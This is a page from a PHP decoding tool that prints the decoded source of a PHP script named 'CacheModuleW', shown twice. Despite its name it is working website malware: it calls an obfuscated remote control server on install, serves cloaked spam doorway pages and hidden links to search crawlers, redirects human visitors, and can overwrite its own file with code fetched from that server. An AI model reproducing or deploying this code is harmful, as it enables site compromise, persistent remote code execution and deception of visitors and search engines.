Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ini_set("display_errors", 1); ini_set("memory_limit", "256M"); ignore_user_abor..
Decoded Output download
<?php
ini_set("display_errors", 1);
ini_set("memory_limit", "256M");
ignore_user_abort(1);
class CacheModuleW
{
private $ver = "4.5";
private $ip;
private $ua;
private $ref;
private $postVar = "nocache";
private $post;
private $au;
private $rid;
private $protocol = "http://";
private $currentUrl;
private $currentHash;
private $cacheDir;
private $pFile;
private $uFile;
private $rFile;
private $currentKeyword = "";
private $checkFile;
private $isDoor = false;
private $isBot = false;
private $redirType = "";
private $redirUrl = "";
private $redirCode = "";
/**
* @var mixed
*/
private $postPass;
public function __construct($au)
{
if (!empty($_POST[$this->postVar]) && $_POST[$this->postVar] === "yes") {
return false;
}
if(stripos("qqq".$_SERVER['REQUEST_URI'], "wp-admin") || stripos("qqq".$_SERVER['REQUEST_URI'], "wp-login.php")){
return false;
}
$this->au = $au;
if (!$this->setVars()) {
return false;
}
$this->install();
if (!empty($this->post)) {
$this->checkRequest();
if (!$this->checkPostPass()) {
return false;
}
}
if (file_exists($this->uFile)) {
$this->isDoor();
$this->checkRedir();
$this->redirActions();
$this->pageActions();
}
return true;
}
private function showPage()
{
if (file_exists($this->cacheDir . "/" . $this->currentHash)) {
$page = file_get_contents($this->cacheDir . "/" . $this->currentHash);
$page = gzinflate($page);
return $page;
}
$postPass = "";
if (file_exists($this->pFile)) {
@include($this->pFile);
}
$params = "rid=" . $this->rid . "&action=getpage&keyword=" . urlencode($this->currentKeyword) . "&hash=" . $this->currentHash . "&url=" . urlencode($this->currentUrl) . "&postpass=" . $postPass;
$page = $this->goPost($this->au, $params);
$page = json_decode($page);
if (!empty($page)) {
if ($page->md5 !== md5($page->content)) {
return "";
}
$page = $page->content;
if (
!stripos("qqq" . $page, "<body")
|| !stripos("qqq" . $page, "<html")
) {
return "";
}
$this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", gzdeflate($page));
return $page;
}
return "";
}
private function showLinks()
{
$page = $this->goPost($this->currentUrl, "", true);
if (empty($page)) {
return "";
}
$page = $this->placeLinks($page);
if (empty($page)) {
return "";
}
return $page;
}
private function placeLinks($page)
{
$links = null;
$save = true;
if (file_exists($this->cacheDir . "/" . $this->currentHash)) {
$links = file_get_contents($this->cacheDir . "/" . $this->currentHash);
$links = json_decode($links);
$save = false;
}
if (empty($links)) {
$links = $this->getRandLinks();
}
if (empty($links)) {
return false;
}
if ($save === true) {
$this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", json_encode($links));
}
return preg_replace("/(<body.*>)/", "\$1" . implode($links), $page, 1);
}
private function pageActions()
{
if ($this->isDoor === true) {
$page = $this->showPage();
if ($this->isBot === false && !empty($this->redirCode)) {
echo $this->redirCode;
die();
}
if (!empty($page)) {
echo $page;
die();
}
} else {
if ($this->isBot === true) {
$page = $this->showLinks();
if (!empty($page)) {
echo $page;
die();
}
}
}
}
private function redirActions()
{
if ($this->redirType === "kt" && $this->isDoor === true) {
$ktRes = $this->goPost($this->redirUrl, "token=" . $this->redirCode . "&log=1&info=1&user_agent=" . urlencode($this->ua) . "&ip=" . $this->ip . "&keyword=" . urlencode($this->currentKeyword) . "&referrer=" . urlencode($this->ref) . "&source=" . urlencode($this->currentUrl));
$ktRes = json_decode($ktRes);
if (!empty($ktRes->body)) {
$this->redirCode = $ktRes->body;
} else {
$this->redirCode = "";
}
if ($ktRes->info->is_bot === true || $ktRes->body == "bot") {
$this->isBot = true;
}
} else {
if (!empty($this->redirCode)) {
$this->redirCode = str_ireplace("[REFERER]", $this->ref, $this->redirCode);
$this->redirCode = str_ireplace("[DOMAIN]", $_SERVER["SERVER_NAME"], $this->redirCode);
$this->redirCode = str_ireplace("[CURURL]", $this->currentUrl, $this->redirCode);
$this->redirCode = str_ireplace("[KEYWORD]", $this->currentKeyword, $this->redirCode);
$this->redirCode = str_ireplace("[DEFISKEY]", str_ireplace(" ", "-", $this->currentKeyword), $this->redirCode);
$this->redirCode = str_ireplace("[PLUSKEY]", str_ireplace(" ", "+", $this->currentKeyword), $this->redirCode);
}
$is_bot = "";
$user_agent_to_filter = array('#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i', '#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i', '#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i', '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i', '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i', '#Yandex#i', '#Yanga#i', '#Yeti#i', '#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i', '#googlebot#i', '#altavista#i', '#scooter#i', '#av\s*fetch#i', '#asterias#i', '#spiderthread revision#i', '#sqworm#i', '#ask#i', '#lycos.spider#i', '#infoseek sidewinder#i', '#ultraseek#i', '#polybot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#bingbot#i');
$stop_ips_masks = array("66\.249\.[6-9][0-9]\.[0-9]", "74\.125\.[0-9]\.[0-9]", "65\.5[2-5]\.[0-9]\.[0-9]", "74\.6\.[0-9]\.[0-9]", "67\.195\.[0-9]\.[0-9]", "72\.30\.[0-9]\.[0-9]", "38\.[0-9]\.[0-9]\.[0-9]", "93\.172\.94\.227", "212\.100\.250\.218", "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "104\.132\.8\.69");
foreach ($stop_ips_masks as $k => $v) {
if (preg_match('#^' . $v . '$#', $this->ip)) {
$is_bot = "bot";
}
}
if (empty($is_bot) && strpos("qqq" . preg_replace($user_agent_to_filter, '-ANGRYBOT-', $this->ua), '-ANGRYBOT-')) {
$is_bot = true;
}
if ($is_bot == true) {
$this->isBot = true;
}
}
}
private function isDoor()
{
$handle = fopen($this->uFile, "r");
$secondCurrentUrl = str_ireplace("http://", "", $this->currentUrl);
$secondCurrentUrl = str_ireplace("https://", "", $secondCurrentUrl);
$secondCurrentUrl = str_ireplace("www.", "", $secondCurrentUrl);
$secondHash = $this->makeHash($secondCurrentUrl, true);
// var_dump($this->currentUrl, $secondCurrentUrl, $secondHash, file($this->uFile));
while (!feof($handle)) {
$oneLine = fgets($handle);
$oneLine = trim($oneLine);
$oneLine = json_decode($oneLine);
if (!empty($oneLine)) {
if ($oneLine->hash === $this->currentHash || $oneLine->hash === $secondHash) {
fclose($handle);
if(!empty($oneLine->keyword)){
$this->currentKeyword = urldecode($oneLine->keyword);
$this->isDoor = true;
}
return true;
}
}
}
fclose($handle);
return false;
}
private function checkRequest()
{
if (!empty($this->post["check"])) {
$result = [
"result" => 1
];
if (!empty($this->post["postpass"])) {
if (!$this->checkPostPass()) {
return false;
}
if ($this->ver !== $this->post["ver"]) {
if ($this->renewClient()) {
$result["renew"] = 1;
}
}
if (file_exists($this->rFile) && !empty($this->post["redmd5"]) && $this->post["redmd5"] !== md5(file_get_contents($this->rFile))) {
if ($this->changeRedirect()) {
$result["changedred"] = 1;
}
}
$hostData = $this->getHostData();
if(!empty($hostData)){
$result["hostdata"] = $hostData;
}
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($result);
die();
}
}
private function getHostData()
{
$result = [];
if (function_exists("execc")) {
$uname = "";
$hostname = "";
$result["uname"] = $uname;
$result["hostname"] = $hostname;
}
return $result;
}
private function changeRedirect()
{
$params = "rid=" . $this->rid . "&action=checkredirect&postpass=" . $this->postPass;
$redirect = $this->goPost($this->au, $params);
$data = json_decode($redirect);
if (empty($data)) {
return false;
}
if ($data->md5 === md5($data->body)) {
$this->fileAction($this->rFile, "w+", $data->body);
return true;
}
return false;
}
private function renewClient()
{
$params = "rid=" . $this->rid . "&action=renew&postpass=" . $this->postPass;
$page = $this->goPost($this->au, $params);
$data = json_decode($page);
if (empty($data)) {
return false;
}
if ($data->md5 === md5($data->body)) {
$this->fileAction(__FILE__, "w+", $data->body);
return true;
}
return false;
}
private function checkRedir()
{
if (file_exists($this->rFile)) {
$redirCode = file_get_contents($this->rFile);
$redirCode = json_decode($redirCode);
if (empty($redirCode)) {
return false;
}
if (empty($redirCode->url) || empty($redirCode->data)) {
return false;
}
if ($redirCode->type === "kt") {
$this->redirType = "kt";
}
$this->redirUrl = $this->dcdAu($redirCode->url);
$this->redirCode = $redirCode->data;
}
return false;
}
private function setVars()
{
$this->au = $this->dcdAu($this->au);
if (empty($this->au)) {
return false;
}
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$this->ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (!empty($_SERVER['REMOTE_ADDR'])) {
$this->ip = $_SERVER['REMOTE_ADDR'];
} else {
$this->ip = "";
}
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$this->ua = $_SERVER['HTTP_USER_AGENT'];
} else {
$this->ua = "";
}
if(
stripos("qqq".$this->ua, "mj12bot.com")
|| stripos("qqq".$this->ua, "seostar.co/robot")
|| stripos("qqq".$this->ua, "AhrefsBot")
|| stripos("qqq".$this->ua, "DataForSeoBot")
|| stripos("qqq".$this->ua, "The Knowledge AI")
|| stripos("qqq".$this->ua, "SiteLockSpider")
) {
return false;
}
if (!empty($_SERVER['HTTP_REFERER'])) {
$this->ref = $_SERVER['HTTP_REFERER'];
} else {
$this->ref = "";
}
$this->post = $_POST;
$this->rid = md5(str_ireplace("www.", "", strtolower($_SERVER['SERVER_NAME'])));
if (isset($_SERVER['HTTPS'])) {
$this->protocol = "https://";
}
$this->currentUrl = $this->protocol . strtolower($_SERVER['SERVER_NAME']) . strtolower($_SERVER['REQUEST_URI']);
$this->currentUrl = rtrim($this->currentUrl, "/");
$this->currentUrl = urldecode($this->currentUrl);
$this->currentHash = $this->makeHash($this->currentUrl);
$this->cacheDir = dirname(__FILE__) . "/cache_w";
$this->checkFile = $this->cacheDir . "/check";
$this->pFile = $this->cacheDir . "/pfile.php";
$this->uFile = $this->cacheDir . "/ufile";
$this->rFile = $this->cacheDir . "/rfile";
return true;
}
private function saveRedirect($data)
{
$this->fileAction($this->rFile, "w+", json_encode($data));
}
private function install()
{
if (stripos("qqq" . $this->currentUrl, ".pdf") || stripos("qqq" . $this->currentUrl, ".xml") || stripos("qqq" . $this->currentUrl, ".pdf")) {
return false;
}
if (!file_exists($this->checkFile)) {
mkdir($this->cacheDir);
$this->fileAction($this->checkFile, "w+", time());
if (file_exists($this->checkFile)) {
$isSecure = "";
if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') {
$isSecure = "yes";
}
$params = "rid=" . $this->rid . "&action=install&url=" . $this->currentUrl . "&path=" . __FILE__."&ssl=".$isSecure;
$incomeData = $this->goPost($this->au, $params);
$incomeData = json_decode($incomeData);
$result = [
"type" => "error"
];
if (!empty($incomeData)) {
if (!empty($incomeData->postpass)) {
$this->savePass($incomeData->postpass);
}
if (!empty($incomeData->urls)) {
foreach ($incomeData->urls as $urlData) {
$toSave = [
"hash" => $this->makeHash($urlData->url),
"url" => urlencode($urlData->url),
"keyword" => urlencode($urlData->keyword)
];
$this->fileAction($this->uFile, "a+", json_encode($toSave) . "
");
}
$result["type"] = "fromurls";
}
if (!empty($incomeData->redirect)) {
$this->saveRedirect($incomeData->redirect);
}
}
}
}
return true;
}
private function makeHash($string, $noStr = false)
{
$string = rtrim($string, "/");
if($noStr === false) {
$string = str_ireplace(
["http://", "https//", "www."],
"",
$string
);
}
return md5(urlencode($string));
}
public function goPost($url, $params, $nocache = false)
{
$params = rtrim($params, '&');
if ($nocache === true) {
$params .= "&" . $this->postVar . "=yes";
}
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $this->rUA());
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_TIMEOUT, 40);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$output = curl_exec($ch);
curl_close($ch);
} else {
$output = file_get_contents($url, false, stream_context_create(array('http' => array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $params))));
}
return $output;
}
private function getRandLinks()
{
if (!file_exists($this->uFile)) {
return false;
}
$links = [];
$linesIndArr = array();
$n = 1;
$handle = fopen($this->uFile, "r");
while (!feof($handle)) {
if (fgets($handle) !== false) {
$linesIndArr[] = $n++;
}
}
fclose($handle);
$linesIndArr = $this->shArr($linesIndArr);
$linesIndArr = array_slice($linesIndArr, 0, rand(4, 6));
$i = 0;
$handle = fopen($this->uFile, "r");
while (!feof($handle)) {
if (count($links) == count($linesIndArr)) {
break;
}
$line = fgets($handle);
if ($line !== false && in_array($i, $linesIndArr)) {
$link = json_decode(trim($line));
if (!empty($link)) {
$link = "<a href='" . urldecode($link->url) . "'>" . urldecode($link->keyword) . "</a> ";
$links[] = $link;
}
}
$i++;
}
fclose($handle);
return $links;
}
function dcdAu($au)
{
$goodservurl = array();
foreach (str_split($au) as $onechar) {
if (is_numeric($onechar)) {
if ($onechar >= 3) {
$onechar = $onechar - 3;
} else {
$onechar = $onechar + 10 - 3;
}
}
$goodservurl[] = $onechar;
}
return urldecode(base64_decode(implode($goodservurl)));
}
private function savePass($pass)
{
$this->fileAction($this->pFile, "w+", "<?php \$postPass = '" . $pass . "'; ?>");
}
private function rUA()
{
$uas = array("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)");
$uas = $this->shArr($uas);
return $uas[0];
}
private function shArr($arr)
{
srand((float)microtime() * 1000000);
shuffle($arr);
return $arr;
}
private function checkPostPass()
{
if (empty($this->post["postpass"])) {
return false;
}
if (file_exists($this->pFile)) {
@include($this->pFile);
if (!empty($postPass)) {
if ($this->post["postpass"] === $postPass) {
$this->postPass = $postPass;
return true;
}
}
}
return false;
}
private function randString($length)
{
$str = "";
$chars = "abcdefghijklmnopqrstuvwxyz0123456789";
$size = strlen($chars);
for ($i = 0; $i < $length; $i++) {
$str .= $chars[rand(0, $size - 1)];
}
return $str;
}
private function fileAction($path, $mode, $data)
{
$fod = fopen($path, $mode);
if (!$fod) {
return false;
}
fwrite($fod, $data);
fclose($fod);
return true;
}
}
$au = "aHR3cCUzQSUyRiUyRndvcmxkdHJhZmZpY6JvdXRlLnRvcCUyRmZhcGQyJTJGYXBpJTJGd52yaw==";
new CacheModuleW($au);
Did this file decode correctly?
Original Code
<?php
ini_set("display_errors", 1);
ini_set("memory_limit", "256M");
ignore_user_abort(1);
class CacheModuleW
{
private $ver = "4.5";
private $ip;
private $ua;
private $ref;
private $postVar = "nocache";
private $post;
private $au;
private $rid;
private $protocol = "http://";
private $currentUrl;
private $currentHash;
private $cacheDir;
private $pFile;
private $uFile;
private $rFile;
private $currentKeyword = "";
private $checkFile;
private $isDoor = false;
private $isBot = false;
private $redirType = "";
private $redirUrl = "";
private $redirCode = "";
/**
* @var mixed
*/
private $postPass;
public function __construct($au)
{
if (!empty($_POST[$this->postVar]) && $_POST[$this->postVar] === "yes") {
return false;
}
if(stripos("qqq".$_SERVER['REQUEST_URI'], "wp-admin") || stripos("qqq".$_SERVER['REQUEST_URI'], "wp-login.php")){
return false;
}
$this->au = $au;
if (!$this->setVars()) {
return false;
}
$this->install();
if (!empty($this->post)) {
$this->checkRequest();
if (!$this->checkPostPass()) {
return false;
}
}
if (file_exists($this->uFile)) {
$this->isDoor();
$this->checkRedir();
$this->redirActions();
$this->pageActions();
}
return true;
}
private function showPage()
{
if (file_exists($this->cacheDir . "/" . $this->currentHash)) {
$page = file_get_contents($this->cacheDir . "/" . $this->currentHash);
$page = gzinflate($page);
return $page;
}
$postPass = "";
if (file_exists($this->pFile)) {
@include($this->pFile);
}
$params = "rid=" . $this->rid . "&action=getpage&keyword=" . urlencode($this->currentKeyword) . "&hash=" . $this->currentHash . "&url=" . urlencode($this->currentUrl) . "&postpass=" . $postPass;
$page = $this->goPost($this->au, $params);
$page = json_decode($page);
if (!empty($page)) {
if ($page->md5 !== md5($page->content)) {
return "";
}
$page = $page->content;
if (
!stripos("qqq" . $page, "<body")
|| !stripos("qqq" . $page, "<html")
) {
return "";
}
$this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", gzdeflate($page));
return $page;
}
return "";
}
private function showLinks()
{
$page = $this->goPost($this->currentUrl, "", true);
if (empty($page)) {
return "";
}
$page = $this->placeLinks($page);
if (empty($page)) {
return "";
}
return $page;
}
private function placeLinks($page)
{
$links = null;
$save = true;
if (file_exists($this->cacheDir . "/" . $this->currentHash)) {
$links = file_get_contents($this->cacheDir . "/" . $this->currentHash);
$links = json_decode($links);
$save = false;
}
if (empty($links)) {
$links = $this->getRandLinks();
}
if (empty($links)) {
return false;
}
if ($save === true) {
$this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", json_encode($links));
}
return preg_replace("/(<body.*>)/", "\$1" . implode($links), $page, 1);
}
private function pageActions()
{
if ($this->isDoor === true) {
$page = $this->showPage();
if ($this->isBot === false && !empty($this->redirCode)) {
echo $this->redirCode;
die();
}
if (!empty($page)) {
echo $page;
die();
}
} else {
if ($this->isBot === true) {
$page = $this->showLinks();
if (!empty($page)) {
echo $page;
die();
}
}
}
}
private function redirActions()
{
if ($this->redirType === "kt" && $this->isDoor === true) {
$ktRes = $this->goPost($this->redirUrl, "token=" . $this->redirCode . "&log=1&info=1&user_agent=" . urlencode($this->ua) . "&ip=" . $this->ip . "&keyword=" . urlencode($this->currentKeyword) . "&referrer=" . urlencode($this->ref) . "&source=" . urlencode($this->currentUrl));
$ktRes = json_decode($ktRes);
if (!empty($ktRes->body)) {
$this->redirCode = $ktRes->body;
} else {
$this->redirCode = "";
}
if ($ktRes->info->is_bot === true || $ktRes->body == "bot") {
$this->isBot = true;
}
} else {
if (!empty($this->redirCode)) {
$this->redirCode = str_ireplace("[REFERER]", $this->ref, $this->redirCode);
$this->redirCode = str_ireplace("[DOMAIN]", $_SERVER["SERVER_NAME"], $this->redirCode);
$this->redirCode = str_ireplace("[CURURL]", $this->currentUrl, $this->redirCode);
$this->redirCode = str_ireplace("[KEYWORD]", $this->currentKeyword, $this->redirCode);
$this->redirCode = str_ireplace("[DEFISKEY]", str_ireplace(" ", "-", $this->currentKeyword), $this->redirCode);
$this->redirCode = str_ireplace("[PLUSKEY]", str_ireplace(" ", "+", $this->currentKeyword), $this->redirCode);
}
$is_bot = "";
$user_agent_to_filter = array('#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i', '#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i', '#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i', '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i', '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i', '#Yandex#i', '#Yanga#i', '#Yeti#i', '#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i', '#googlebot#i', '#altavista#i', '#scooter#i', '#av\s*fetch#i', '#asterias#i', '#spiderthread revision#i', '#sqworm#i', '#ask#i', '#lycos.spider#i', '#infoseek sidewinder#i', '#ultraseek#i', '#polybot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#bingbot#i');
$stop_ips_masks = array("66\.249\.[6-9][0-9]\.[0-9]", "74\.125\.[0-9]\.[0-9]", "65\.5[2-5]\.[0-9]\.[0-9]", "74\.6\.[0-9]\.[0-9]", "67\.195\.[0-9]\.[0-9]", "72\.30\.[0-9]\.[0-9]", "38\.[0-9]\.[0-9]\.[0-9]", "93\.172\.94\.227", "212\.100\.250\.218", "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "104\.132\.8\.69");
foreach ($stop_ips_masks as $k => $v) {
if (preg_match('#^' . $v . '$#', $this->ip)) {
$is_bot = "bot";
}
}
if (empty($is_bot) && strpos("qqq" . preg_replace($user_agent_to_filter, '-ANGRYBOT-', $this->ua), '-ANGRYBOT-')) {
$is_bot = true;
}
if ($is_bot == true) {
$this->isBot = true;
}
}
}
private function isDoor()
{
$handle = fopen($this->uFile, "r");
$secondCurrentUrl = str_ireplace("http://", "", $this->currentUrl);
$secondCurrentUrl = str_ireplace("https://", "", $secondCurrentUrl);
$secondCurrentUrl = str_ireplace("www.", "", $secondCurrentUrl);
$secondHash = $this->makeHash($secondCurrentUrl, true);
// var_dump($this->currentUrl, $secondCurrentUrl, $secondHash, file($this->uFile));
while (!feof($handle)) {
$oneLine = fgets($handle);
$oneLine = trim($oneLine);
$oneLine = json_decode($oneLine);
if (!empty($oneLine)) {
if ($oneLine->hash === $this->currentHash || $oneLine->hash === $secondHash) {
fclose($handle);
if(!empty($oneLine->keyword)){
$this->currentKeyword = urldecode($oneLine->keyword);
$this->isDoor = true;
}
return true;
}
}
}
fclose($handle);
return false;
}
private function checkRequest()
{
if (!empty($this->post["check"])) {
$result = [
"result" => 1
];
if (!empty($this->post["postpass"])) {
if (!$this->checkPostPass()) {
return false;
}
if ($this->ver !== $this->post["ver"]) {
if ($this->renewClient()) {
$result["renew"] = 1;
}
}
if (file_exists($this->rFile) && !empty($this->post["redmd5"]) && $this->post["redmd5"] !== md5(file_get_contents($this->rFile))) {
if ($this->changeRedirect()) {
$result["changedred"] = 1;
}
}
$hostData = $this->getHostData();
if(!empty($hostData)){
$result["hostdata"] = $hostData;
}
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($result);
die();
}
}
private function getHostData()
{
$result = [];
if (function_exists("execc")) {
$uname = "";
$hostname = "";
$result["uname"] = $uname;
$result["hostname"] = $hostname;
}
return $result;
}
private function changeRedirect()
{
$params = "rid=" . $this->rid . "&action=checkredirect&postpass=" . $this->postPass;
$redirect = $this->goPost($this->au, $params);
$data = json_decode($redirect);
if (empty($data)) {
return false;
}
if ($data->md5 === md5($data->body)) {
$this->fileAction($this->rFile, "w+", $data->body);
return true;
}
return false;
}
private function renewClient()
{
$params = "rid=" . $this->rid . "&action=renew&postpass=" . $this->postPass;
$page = $this->goPost($this->au, $params);
$data = json_decode($page);
if (empty($data)) {
return false;
}
if ($data->md5 === md5($data->body)) {
$this->fileAction(__FILE__, "w+", $data->body);
return true;
}
return false;
}
private function checkRedir()
{
if (file_exists($this->rFile)) {
$redirCode = file_get_contents($this->rFile);
$redirCode = json_decode($redirCode);
if (empty($redirCode)) {
return false;
}
if (empty($redirCode->url) || empty($redirCode->data)) {
return false;
}
if ($redirCode->type === "kt") {
$this->redirType = "kt";
}
$this->redirUrl = $this->dcdAu($redirCode->url);
$this->redirCode = $redirCode->data;
}
return false;
}
private function setVars()
{
$this->au = $this->dcdAu($this->au);
if (empty($this->au)) {
return false;
}
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$this->ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (!empty($_SERVER['REMOTE_ADDR'])) {
$this->ip = $_SERVER['REMOTE_ADDR'];
} else {
$this->ip = "";
}
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$this->ua = $_SERVER['HTTP_USER_AGENT'];
} else {
$this->ua = "";
}
if(
stripos("qqq".$this->ua, "mj12bot.com")
|| stripos("qqq".$this->ua, "seostar.co/robot")
|| stripos("qqq".$this->ua, "AhrefsBot")
|| stripos("qqq".$this->ua, "DataForSeoBot")
|| stripos("qqq".$this->ua, "The Knowledge AI")
|| stripos("qqq".$this->ua, "SiteLockSpider")
) {
return false;
}
if (!empty($_SERVER['HTTP_REFERER'])) {
$this->ref = $_SERVER['HTTP_REFERER'];
} else {
$this->ref = "";
}
$this->post = $_POST;
$this->rid = md5(str_ireplace("www.", "", strtolower($_SERVER['SERVER_NAME'])));
if (isset($_SERVER['HTTPS'])) {
$this->protocol = "https://";
}
$this->currentUrl = $this->protocol . strtolower($_SERVER['SERVER_NAME']) . strtolower($_SERVER['REQUEST_URI']);
$this->currentUrl = rtrim($this->currentUrl, "/");
$this->currentUrl = urldecode($this->currentUrl);
$this->currentHash = $this->makeHash($this->currentUrl);
$this->cacheDir = dirname(__FILE__) . "/cache_w";
$this->checkFile = $this->cacheDir . "/check";
$this->pFile = $this->cacheDir . "/pfile.php";
$this->uFile = $this->cacheDir . "/ufile";
$this->rFile = $this->cacheDir . "/rfile";
return true;
}
private function saveRedirect($data)
{
$this->fileAction($this->rFile, "w+", json_encode($data));
}
private function install()
{
if (stripos("qqq" . $this->currentUrl, ".pdf") || stripos("qqq" . $this->currentUrl, ".xml") || stripos("qqq" . $this->currentUrl, ".pdf")) {
return false;
}
if (!file_exists($this->checkFile)) {
mkdir($this->cacheDir);
$this->fileAction($this->checkFile, "w+", time());
if (file_exists($this->checkFile)) {
$isSecure = "";
if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') {
$isSecure = "yes";
}
$params = "rid=" . $this->rid . "&action=install&url=" . $this->currentUrl . "&path=" . __FILE__."&ssl=".$isSecure;
$incomeData = $this->goPost($this->au, $params);
$incomeData = json_decode($incomeData);
$result = [
"type" => "error"
];
if (!empty($incomeData)) {
if (!empty($incomeData->postpass)) {
$this->savePass($incomeData->postpass);
}
if (!empty($incomeData->urls)) {
foreach ($incomeData->urls as $urlData) {
$toSave = [
"hash" => $this->makeHash($urlData->url),
"url" => urlencode($urlData->url),
"keyword" => urlencode($urlData->keyword)
];
$this->fileAction($this->uFile, "a+", json_encode($toSave) . "\n");
}
$result["type"] = "fromurls";
}
if (!empty($incomeData->redirect)) {
$this->saveRedirect($incomeData->redirect);
}
}
}
}
return true;
}
private function makeHash($string, $noStr = false)
{
$string = rtrim($string, "/");
if($noStr === false) {
$string = str_ireplace(
["http://", "https//", "www."],
"",
$string
);
}
return md5(urlencode($string));
}
public function goPost($url, $params, $nocache = false)
{
$params = rtrim($params, '&');
if ($nocache === true) {
$params .= "&" . $this->postVar . "=yes";
}
